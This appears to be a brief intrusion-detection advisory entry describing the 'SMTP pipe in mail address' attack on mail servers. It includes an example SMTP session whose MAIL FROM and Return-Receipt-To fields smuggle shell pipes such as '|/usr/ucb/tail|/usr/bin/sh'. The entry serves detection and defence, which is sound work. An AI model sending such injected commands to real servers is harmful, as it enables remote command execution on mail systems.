|
SMTP pipe in mail address |
|
|
|
| FAQ | |||
|
|
SummarySomeone is attempting to compromise the e-mail server by sending shell executable code within the e-mail address. This has been known to compromise the e-mail server itself, as well as processing subsystems that will eventually handle the e-mail.
Example Exploit
The following SMTP session is an example of an exploit of this vulnerability.
HELO MAIL FROM: |/usr/ucb/tail|/usr/bin/sh RCPT TO: root DATA From: attacker@example.com To: victim@example.com Return-Receipt-To: |foobar Subject: Sample Exploit
| more information |
Version appeared: